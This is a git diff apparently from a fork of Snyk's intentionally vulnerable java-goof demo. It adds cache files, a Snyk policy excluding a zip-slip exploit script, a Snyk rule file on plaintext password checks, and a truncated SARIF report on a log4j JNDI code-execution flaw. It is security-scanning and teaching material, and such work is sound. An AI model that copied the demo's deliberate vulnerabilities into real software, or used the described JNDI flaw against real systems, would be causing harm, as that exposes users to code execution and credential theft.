461382d325567c4c669cef5176148d9e14be127fc4793652542612e372eb5432"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/home.jsp":[4828,1707749068027.7083,"b0cd89cd2c9d5a9dacb4e285ff924078315d9c937d6ea1a3605a538bbe05b0eb"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/login.jsp":[2108,1707749068027.8154,"fef8f3f5c975a6a4912b5708b8b5cd3409b6d749569f7eca1d7b9f7793f8766a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/register.jsp":[3249,1707749068027.9233,"5495c3acf8521dc6e68b66fb1e68ce835316d11cebf02d73e2407b23dd5f1dc9"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/TodoServiceTest.java":[2061,1707749068020.2898,"97a4d9a387a2b063bed68c376282b7844fd77e1a1ab6bfa9f566fb6
c66815ab3"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/UserServiceTest.java":[1911,1707749068020.393,"f08674cb5b00b45c4f2c0f5478b62a8d6da2e610ebf928d95d0f162ccf6b25f1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/Statics.java":[302,1707749068017.4575,"faf8ae30c8c00074f924d68192efea8ddf173d772e3857987eebc8474af8a025"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Priority.java":[1400,1707749068017.6262,"fbcf56cefa0166697104dc80f3cd9454e0a9ed64f32bf1f51b8ff52c61ade443"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Todo.java":[5142,1707749068017.7947,"e511ab0dcf0d6d60e2a08912558a03d2f3c2b4246cb374fc899c7375707a8ba6"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/User.java":[2744,1707749068017.8948,"82a4b1757798282d230b769625371b91f2a8892ad313f088159147548a511ce1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/TodoRepository.java":[2606,1707749068018.112,"a4b3b4808634f298057a0a480b55a279d4387af97bf285ecaf674dfea43184e1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/UserRepository.java":[2317,1707749068018.204,"dd3a1c73160008585fac38906516ee38a4c1ef58b1d8dca35b3c62a160318178"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/TodoRepositoryImpl.java":[3171,1707749068018.3552,"80a2b851d940654643a460c2caae7ae6c2388353e7f9f50ae7c00df84cff1b57"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/UserRepositoryImp
l.java":[3163,1707749068018.4534,"78b6b47b4356741a6f46104bade197655e9dd6064821d8bce20fd555f97880b5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/TodoService.java":[2585,1707749068018.6626,"2633068fbc59901a47a3a3bc9ae24be71a1f89f5bcbab9b88a69fdce4aa77b14"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/UserService.java":[2298,1707749068018.7725,"3dca704e01dcd28b8745421c21b4dc83f89020f5a0806f166bfee124f476a1b8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/TodoServiceImpl.java":[2798,1707749068018.8906,"ff7c4f6a14b51f6918b875849eba94d08cd041ea4262a5ba232f4c4724e3a117"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/UserServiceImpl.java":[2591,1707749068018.9702,"d44ca42fecf28dfe4c6a0ecc2a0bfacde4c97fffde20fe876a8fd1fce6184c97"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/AboutAction.java":[1593,1707749068023.9092,"aac0c815b65e7aa372635e13a1874b97404796162fdab3c8a2db8ccc665bfb77"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/BaseAction.java":[2755,1707749068024.01,"818c334580003a9059f8b9e343eee5527397c1cd54408a278c1e42c1c498af03"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/IndexAction.java":[1474,1707749068024.1094,"2b1fe3a7d1afc307195a1803b64955b233d41e26a0d5b38b8029c794ed5f0463"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/interceptor/LoginInterceptor.java":[2204,1707749068025.1648,"b4ae8f17a0cc66a14234de9f635874e100546098e5e67
b7999beade579019b15"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/HighlightTag.java":[3515,1707749068021.8755,"67df60f194c628b276134716f0d43d102d18a4ffdc5bcbd4afe834ad50f8af28"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/PriorityIconTag.java":[2167,1707749068022.0413,"b24e9381e1690b8c0ca9535c6fd50d472311f00bd520b4ceadd98d2b5ce80d85"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusLabelTag.java":[2085,1707749068022.2034,"af0925afa455c491d83245a16a39c98ac8fec45b4b035070a15d60ef47cfe074"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusStyleTag.java":[2105,1707749068022.3518,"82c42e37d2c6c02fc69297379a8183dd8bc8bbd80d29fca2a0868e7a532a1f95"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/ChangePasswordForm.java":[2569,1707749068021.3772,"f1b0c8025daf900938caf746a85fe7df9cfeef0b85e7525eecc345daddacec83"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/LoginForm.java":[2097,1707749068021.4858,"303ba1f62ae2a9251c7fd1e1132bc91c6dbeacb760f0f8bad4d8f802b48bf4c7"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/RegistrationForm.java":[2783,1707749068021.578,"65958478e6c6df53811e97bd5a0e54489272be2e06bfb3a14641922c11e1dc1c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/util/TodoListUtils.java":[4018,1707749068022.542,"a743f24c83b6992948cb46bf8b2bd4d4b1c11dfd41a81c66c584d80d
3b77e0a4"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/SearchTodoAction.java":[2347,1707749068024.2808,"23c393191001a8548c66a6112786261fd8821fea6ecbcbaded85ffc695c65499"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/TodoAction.java":[4174,1707749068024.5068,"f779cf49f727c3a070c3e17ecb29d4d1c8cc9844158393e7baad575f86c9f311"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java":[11846,1707749068024.6938,"70d6b7ad7b556b98b17dd858b269daed067f4d0f4b6f2d7079c599e469d86168"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/FilesAction.java":[2536,1707749068024.7944,"e47d909ef3e3a224f723c2dbdd6b35ee131064090570cdcf3ec0a514efa8767d"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/HomeAction.java":[2513,1707749068024.883,"142a48bf4f5665546d1168347897fac76cae74d361f9f6a9476c6b90d8c3dc12"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/SessionAction.java":[3351,1707749068024.9883,"25a2fbf3e1485401fe11418e42e76149b0f2ec38a1a6dc3dde038be9e0be28d9"]} \ No newline at end of file diff --git a/.gradle/8.11.1/checksums/checksums.lock b/.gradle/8.11.1/checksums/checksums.lock new file mode 100644 index 0000000000000000000000000000000000000000..23797ae90f3508dc2e271d1bda488eb265d77622 GIT binary patch literal 17 TcmZQxerCs($*p~{3{U_7KS%`T literal 0 HcmV?d00001 
diff --git a/.gradle/8.11.1/fileChanges/last-build.bin b/.gradle/8.11.1/fileChanges/last-build.bin new file mode 100644 index 0000000000000000000000000000000000000000..f76dd238ade08917e6712764a16a22005a50573d GIT binary patch literal 1 IcmZPo000310RR91 literal 0 HcmV?d00001 diff --git a/.gradle/8.11.1/fileHashes/fileHashes.lock b/.gradle/8.11.1/fileHashes/fileHashes.lock new file mode 100644 index 0000000000000000000000000000000000000000..17e57034245966f86458796385dfa0f9509cb1aa GIT binary patch literal 17 ScmZQ>W(?t*ml1r40SW*lQ3DkK literal 0 HcmV?d00001 diff --git a/.gradle/8.11.1/gc.properties b/.gradle/8.11.1/gc.properties new file mode 100644 index 0000000000..e69de29bb2 diff --git a/.gradle/8.8/checksums/checksums.lock b/.gradle/8.8/checksums/checksums.lock new file mode 100644 index 0000000000000000000000000000000000000000..074c6c94a4cdad2098aa6cc1f792d32f796cf7c3 GIT binary patch literal 17 TcmZS15ubbP3LkeQ0~7!NDH;PX literal 0 HcmV?d00001 diff --git a/.gradle/8.8/dependencies-accessors/gc.properties b/.gradle/8.8/dependencies-accessors/gc.properties new file mode 100644 index 0000000000..e69de29bb2 diff --git a/.gradle/8.8/fileChanges/last-build.bin b/.gradle/8.8/fileChanges/last-build.bin new file mode 100644 index 0000000000000000000000000000000000000000..f76dd238ade08917e6712764a16a22005a50573d GIT binary patch literal 1 IcmZPo000310RR91 literal 0 HcmV?d00001 diff --git a/.gradle/8.8/fileHashes/fileHashes.bin b/.gradle/8.8/fileHashes/fileHashes.bin new file mode 100644 index 0000000000000000000000000000000000000000..3aa9dcacf9f29688729607b7da35724157196e72 GIT binary patch literal 18547 zcmeI(F^U2)6adgD!h#42vM?a%ZX*aHf`zSug_WIn0XtdPPS3H$+F6Uer?9p43?4x< zjDuGYc^{H|lIH){CYgkg)NYRm&-i?%G6Dn$5FkK+009C72oNAZfB*pk1PBlyK;T^j z=CP4-)=bhZrb%@jLcbD|!uIF5+qYMZ?07oP?+@}d?su{?GXVkw2oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly@CpKhSVa2R|2rME<>p%d d`Z$a(i~rx#uvvi_@% literal 0 HcmV?d00001 
diff --git a/.gradle/8.8/gc.properties b/.gradle/8.8/gc.properties new file mode 100644 index 0000000000..e69de29bb2 diff --git a/.gradle/buildOutputCleanup/buildOutputCleanup.lock b/.gradle/buildOutputCleanup/buildOutputCleanup.lock new file mode 100644 index 0000000000000000000000000000000000000000..6b811c0daebe6dfdadeaec7b84c4bdd2727308e3 GIT binary patch literal 17 UcmZQxzE%C?_1RY+Ge7_n079|_d;kCd literal 0 HcmV?d00001 diff --git a/.gradle/buildOutputCleanup/cache.properties b/.gradle/buildOutputCleanup/cache.properties new file mode 100644 index 0000000000..c8df739866 --- /dev/null +++ b/.gradle/buildOutputCleanup/cache.properties @@ -0,0 +1,2 @@ +#Tue Mar 04 11:54:01 EST 2025 +gradle.version=8.11.1 diff --git a/.gradle/vcs-1/gc.properties b/.gradle/vcs-1/gc.properties new file mode 100644 index 0000000000..e69de29bb2 diff --git a/.snyk b/.snyk new file mode 100644 index 0000000000..07c8b1416e --- /dev/null +++ b/.snyk @@ -0,0 +1,8 @@ +# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities. +version: v1.25.0 +# ignores vulnerabilities until expiry date; change duration by modifying expiry date +ignore: +patch: {} +exclude: + global: + - todolist-goof/exploits/zip-slip.py diff --git a/as.json b/as.json new file mode 100644 index 0000000000..e69de29bb2 diff --git a/boutput.json b/boutput.json new file mode 100644 index 0000000000..243e1080d7 --- /dev/null +++ b/boutput.json 
@@ -0,0 +1,507 @@ +{ + "id": "java/ReturnsPassword", + "name": "ReturnsPassword", + "shortDescription": { + "text": "Unprotected Storage of Credentials" + }, + "defaultConfiguration": { + "level": "warning" + }, + "help": { + "markdown": "## Details\n\nIf credentials are not protected or not sufficiently protected through strong encryption, attackers can access this information in a number of ways. Developers may rely on plain-text storage of credentials when they believe the system is completely secure from attack or only accessible to insiders. This confidence is misguided and dangerous. If a malicious insider-such as a former employee-or a hostile attacker using SQL injection, XML injection, or a brute-force attack accesses the system, they can access this credential information to gain unauthorized permissions within the system and to export other confidential and secure information.\n\n## Best practices for prevention\n* Ensure that passwords are never stored in plain text, even for \"purely internal\" use.\n* Never rely on password encoding, such as base 64 encoding; choose a complex encryption algorithm that includes salting, then hashing.\n* Implement zero-trust approaches in which users have access only to information needed for legitimate business purposes.\n* To the greatest extent possible, secure the application against injection attacks and other types of weaknesses.", + "text": "" + }, + "properties": { + "tags": [ + "java", + "ReturnsPassword", + "Security" + ], + "categories": [ + "Security" + ], + "exampleCommitFixes": [ + { + "commitURL": "https://github.com/ShotaOd/carbon/commit/4562a7a2c0f27065ed63c7615f044423ad1701fd?diff=split#diff-5a57acf4efafddf23331cc9f3c8d724e1cdd01633f61aa2d4e680b9b5241ff71L-1", + "lines": [ + { + "line": "import org.mindrot.jbcrypt.BCrypt;\n", + "lineNumber": 6, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 7, + "lineChange": "none" + }, + { + "line": "/**\n", + "lineNumber": 8, + "lineChange": "none" 
+ }, + { + "line": " * @author Shota Oda 2016/11/23.\n", + "lineNumber": 9, + "lineChange": "none" + }, + { + "line": " */\n", + "lineNumber": 10, + "lineChange": "none" + }, + { + "line": "@Data\n", + "lineNumber": 11, + "lineChange": "none" + }, + { + "line": "@AllArgsConstructor\n", + "lineNumber": 12, + "lineChange": "none" + }, + { + "line": "public class BusinessAuthIdentity implements AuthIdentity{\n", + "lineNumber": 13, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 14, + "lineChange": "none" + }, + { + "line": "\tprivate Lecturer user;\n", + "lineNumber": 15, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 16, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 17, + "lineChange": "none" + }, + { + "line": "\tpublic String username() {\n", + "lineNumber": 18, + "lineChange": "none" + }, + { + "line": "\t\treturn user.getUsername();\n", + "lineNumber": 19, + "lineChange": "none" + }, + { + "line": "\t}\n", + "lineNumber": 20, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 21, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 22, + "lineChange": "none" + }, + { + "line": "\tpublic String cryptPassword() {\n", + "lineNumber": 23, + "lineChange": "none" + }, + { + "line": "\t\treturn user.getPassword();\n", + "lineNumber": 24, + "lineChange": "none" + }, + { + "line": "\t}\n", + "lineNumber": 25, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 26, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 27, + "lineChange": "none" + }, + { + "line": "\tpublic boolean confirm(String plainPassword) {\n", + "lineNumber": 28, + "lineChange": "none" + }, + { + "line": "\t\treturn cryptPassword().equals(plainPassword);\n", + "lineNumber": 28, + "lineChange": "removed" + }, + { + "line": " return BCrypt.checkpw(plainPassword, cryptPassword());\n", + "lineNumber": 29, + "lineChange": "added" + } + ] + }, + { + "commitURL": 
"https://github.com/ShotaOd/carbon/commit/4562a7a2c0f27065ed63c7615f044423ad1701fd?diff=split#diff-52010d754aef2fbde5a21bb6e6002096c329060b69306e842cd24a31129752b1L-1", + "lines": [ + { + "line": "import org.mindrot.jbcrypt.BCrypt;\n", + "lineNumber": 6, + "lineChange": "added" + }, + { + "line": "\n", + "lineNumber": 7, + "lineChange": "none" + }, + { + "line": "/**\n", + "lineNumber": 8, + "lineChange": "none" + }, + { + "line": " * @author Shota Oda 2016/11/23.\n", + "lineNumber": 9, + "lineChange": "none" + }, + { + "line": " */\n", + "lineNumber": 10, + "lineChange": "none" + }, + { + "line": "@Data\n", + "lineNumber": 11, + "lineChange": "none" + }, + { + "line": "@AllArgsConstructor\n", + "lineNumber": 12, + "lineChange": "none" + }, + { + "line": "public class ConsumerAuthIdentity implements AuthIdentity{\n", + "lineNumber": 13, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 14, + "lineChange": "none" + }, + { + "line": "\tprivate Student student;\n", + "lineNumber": 15, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 16, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 17, + "lineChange": "none" + }, + { + "line": "\tpublic String username() {\n", + "lineNumber": 18, + "lineChange": "none" + }, + { + "line": "\t\treturn student.getUsername();\n", + "lineNumber": 19, + "lineChange": "none" + }, + { + "line": "\t}\n", + "lineNumber": 20, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 21, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 22, + "lineChange": "none" + }, + { + "line": "\tpublic String cryptPassword() {\n", + "lineNumber": 23, + "lineChange": "none" + }, + { + "line": "\t\treturn student.getPassword();\n", + "lineNumber": 24, + "lineChange": "none" + }, + { + "line": "\t}\n", + "lineNumber": 25, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 26, + "lineChange": "none" + }, + { + "line": "\t@Override\n", + "lineNumber": 27, + 
"lineChange": "none" + }, + { + "line": "\tpublic boolean confirm(String plainPassword) {\n", + "lineNumber": 28, + "lineChange": "none" + }, + { + "line": "\t\treturn cryptPassword().equals(plainPassword);\n", + "lineNumber": 28, + "lineChange": "removed" + }, + { + "line": "\t\treturn BCrypt.checkpw(plainPassword, cryptPassword());\n", + "lineNumber": 29, + "lineChange": "added" + } + ] + }, + { + "commitURL": "https://github.com/SeraphJACK/SimpleLogin/commit/ff6715f90b9a3e00f7201618ff2f4986c5ebc0f5?diff=split#diff-c79ff75898e7300d5901fce735e57a03db459d401284e7c67ec4711d5adebba4L-1", + "lines": [ + { + "line": "import org.mindrot.jbcrypt.BCrypt;\n", + "lineNumber": 4, + "lineChange": "added" + }, + { + "line": "import top.seraphjack.simplelogin.SLConfig;\n", + "lineNumber": 5, + "lineChange": "none" + }, + { + "line": "import top.seraphjack.simplelogin.SimpleLogin;\n", + "lineNumber": 6, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 7, + "lineChange": "none" + }, + { + "line": "import javax.annotation.concurrent.NotThreadSafe;\n", + "lineNumber": 8, + "lineChange": "none" + }, + { + "line": "import java.io.IOException;\n", + "lineNumber": 9, + "lineChange": "none" + }, + { + "line": "import java.nio.charset.StandardCharsets;\n", + "lineNumber": 10, + "lineChange": "none" + }, + { + "line": "import java.nio.file.Files;\n", + "lineNumber": 11, + "lineChange": "none" + }, + { + "line": "import java.nio.file.Path;\n", + "lineNumber": 12, + "lineChange": "none" + }, + { + "line": "import java.nio.file.StandardOpenOption;\n", + "lineNumber": 13, + "lineChange": "none" + }, + { + "line": "import java.util.Arrays;\n", + "lineNumber": 14, + "lineChange": "none" + }, + { + "line": "import java.util.HashMap;\n", + "lineNumber": 15, + "lineChange": "none" + }, + { + "line": "import java.util.Map;\n", + "lineNumber": 16, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 17, + "lineChange": "none" + }, + { + "line": "@NotThreadSafe\n", + 
"lineNumber": 18, + "lineChange": "none" + }, + { + "line": "public class StorageProviderFile implements StorageProvider {\n", + "lineNumber": 19, + "lineChange": "none" + }, + { + "line": " private Gson gson;\n", + "lineNumber": 20, + "lineChange": "none" + }, + { + "line": " private Path path;\n", + "lineNumber": 21, + "lineChange": "none" + }, + { + "line": " private Map entries;\n", + "lineNumber": 22, + "lineChange": "none" + }, + { + "line": " private boolean dirty = false;\n", + "lineNumber": 23, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 24, + "lineChange": "none" + }, + { + "line": " StorageProviderFile(Path path) throws IOException {\n", + "lineNumber": 24, + "lineChange": "none" + }, + { + "line": " this.path = path;\n", + "lineNumber": 26, + "lineChange": "none" + }, + { + "line": " this.gson = new Gson();\n", + "lineNumber": 27, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 28, + "lineChange": "none" + }, + { + "line": " if (Files.exists(path)) {\n", + "lineNumber": 29, + "lineChange": "none" + }, + { + "line": " entries = new HashMap<>();\n", + "lineNumber": 30, + "lineChange": "none" + }, + { + "line": " Arrays.stream(gson.fromJson(new String(Files.readAllBytes(path), StandardCharsets.UTF_8), POJOUserEntry[].class)).forEach(e -> entries.put(e.username, e));\n", + "lineNumber": 31, + "lineChange": "none" + }, + { + "line": " } else {\n", + "lineNumber": 32, + "lineChange": "none" + }, + { + "line": " if (!Files.exists(path.getParent())) {\n", + "lineNumber": 33, + "lineChange": "none" + }, + { + "line": " Files.createDirectories(path.getParent());\n", + "lineNumber": 34, + "lineChange": "none" + }, + { + "line": " }\n", + "lineNumber": 35, + "lineChange": "none" + }, + { + "line": " entries = new HashMap<>();\n", + "lineNumber": 36, + "lineChange": "none" + }, + { + "line": " Files.createFile(path);\n", + "lineNumber": 37, + "lineChange": "none" + }, + { + "line": " }\n", + "lineNumber": 38, + "lineChange": 
"none" + }, + { + "line": " }\n", + "lineNumber": 39, + "lineChange": "none" + }, + { + "line": "\n", + "lineNumber": 40, + "lineChange": "none" + }, + { + "line": " @Override\n", + "lineNumber": 41, + "lineChange": "none" + }, + { + "line": " public boolean checkPassword(String username, String password) {\n", + "lineNumber": 42, + "lineChange": "none" + }, + { + "line": " if (entries.containsKey(username)) {\n", + "lineNumber": 43, + "lineChange": "none" + }, + { + "line": " return entries.get(username).password.equals(password);\n", + "lineNumber": 43, + "lineChange": "removed" + }, + { + "line": " return BCrypt.checkpw(password, entries.get(username).password);\n", + "lineNumber": 44, + "lineChange": "added" + } + ] + } + ], + "exampleCommitDescriptions": [], + "precision": "very-high", + "repoDatasetSize": 2, + "cwe": [ + "CWE-256" + ] + } +} diff --git a/build/reports/problems/problems-report.html b/build/reports/problems/problems-report.html new file mode 100644 index 0000000000..d3b4649247 --- /dev/null +++ b/build/reports/problems/problems-report.html @@ -0,0 +1,663 @@ + + + + + + + + + + + + + Gradle Configuration Cache + + + +
+ +
+ Loading... +
+ + + + + + diff --git a/index.html b/index.html new file mode 100644 index 0000000000..342510837f --- /dev/null +++ b/index.html @@ -0,0 +1 @@ +HTTP Status 429 – Too Many Requests

HTTP Status 429 – Too Many Requests


Type Status Report

Message Rate limit exceeded

Description The user has sent too many requests in a given amount of time ("rate limiting").


\ No newline at end of file
diff --git a/log4shell-goof/.dccache b/log4shell-goof/.dccache
new file mode 100644
index 0000000000..b1b94b129a
--- /dev/null
+++ b/log4shell-goof/.dccache
@@ -0,0 +1 @@
+{"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/pom.xml":[813,1707749068003.1423,"e3ab9c5fd3179257a8c7aabd94eaea5eaa5da23a5a61a7395e06ec0d4d29093c"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/pom.xml":[1522,1707749068001.598,"849085e013ad19cc95f39178fa254c7e98c69c7539550bfc12ed4dfe163a25de"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/pom.xml":[2629,1707749068002.589,"69176bc5c5aed490d7cdeb4c3a6bf06f25d8e3609b2824d7cd7da97741f697ba"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/src/main/java/Main.java":[1581,1707749068001.87,"771ba599971e26873da00309f2e5f2d764fcc0edbe2d1c345841891aa3588a26"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Evil.java":[496,1707749068002.8047,"51919d812e029ba3072f606a02420fc15bf479506dfe8075a7042adca8923993"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Server.java":[7682,1707749068002.9707,"190e04c4ba5e3750e4fb8ff2f87c06b88a9b2cd7403ddb9458c9d4d3072d0aff"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Vandalize.java":[632,1707749068003.0623,"691d442e5a144bc4cc10204ebbf253abfa45ec13699d87b806c503b435850dc5"]}
\ No newline at end of file
diff --git a/log4shell-goof/log4shell-client/.dccache b/log4shell-goof/log4shell-client/.dccache
new file mode 100644
index 0000000000..48d2f9d00d
--- /dev/null
+++ b/log4shell-goof/log4shell-client/.dccache
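Review bot: `log4shell-goof/.dccache` is a local Snyk Code cache keyed by absolute paths under `/Users/austindoll/...`, so committing it publishes the developer's machine username and checkout layout together with what appear to be per-file sizes, timestamps and digests that will never match another clone; the same applies to the copies at the `log4shell-client/.dccache`, `log4shell-client/src/main/java/.dccache` and `log4shell-server/.dccache` hunks. The `index.html` hunk that also ends on this line is a saved `HTTP Status 429 – Too Many Requests` response page with no role in the project. Remove these files and add `.dccache` to `.gitignore` so the cache is regenerated locally instead of tracked.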
@@ -0,0 +1 @@
+{"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/pom.xml":[1522,1707749068001.598,"849085e013ad19cc95f39178fa254c7e98c69c7539550bfc12ed4dfe163a25de"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/src/main/java/Main.java":[1581,1707749068001.87,"771ba599971e26873da00309f2e5f2d764fcc0edbe2d1c345841891aa3588a26"]}
\ No newline at end of file
diff --git a/log4shell-goof/log4shell-client/src/main/java/.dccache b/log4shell-goof/log4shell-client/src/main/java/.dccache
new file mode 100644
index 0000000000..36e70e18a1
--- /dev/null
+++ b/log4shell-goof/log4shell-client/src/main/java/.dccache
@@ -0,0 +1 @@
+{"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/src/main/java/Main.java":[1581,1707749068001.87,"771ba599971e26873da00309f2e5f2d764fcc0edbe2d1c345841891aa3588a26"]}
\ No newline at end of file
diff --git a/log4shell-goof/log4shell-client/test-vuln.json b/log4shell-goof/log4shell-client/test-vuln.json
new file mode 100644
index 0000000000..ac80e180e8
--- /dev/null
+++ b/log4shell-goof/log4shell-client/test-vuln.json
@@ -0,0 +1,90 @@ +{ + "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", + "version": "2.1.0", + "runs": [ + { + "tool": { + "driver": { + "name": "Snyk Open Source", + "properties": { + "artifactsScanned": 2 + }, + "rules": [ + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "shortDescription": { + "text": "Medium severity - Arbitrary Code Execution vulnerability in org.apache.logging.log4j:log4j-core" + }, + "fullDescription": { + "text": "(CVE-2021-44832) org.apache.logging.log4j:log4j-core@2.14.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.logging.log4j:log4j-core\n* Introduced through: io.snyk:log4shell-client@0.0.1-SNAPSHOT and org.apache.logging.log4j:log4j-core@2.14.1\n### Detailed paths\n* _Introduced through_: io.snyk:log4shell-client@0.0.1-SNAPSHOT › org.apache.logging.log4j:log4j-core@2.14.1\n# Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n# Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n# Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n# References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "maven" + ], + "cvssv3_baseScore": 6.6, + "security-severity": "6.6" + } + } + ] + } + }, + "results": [ + { + "ruleId": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable 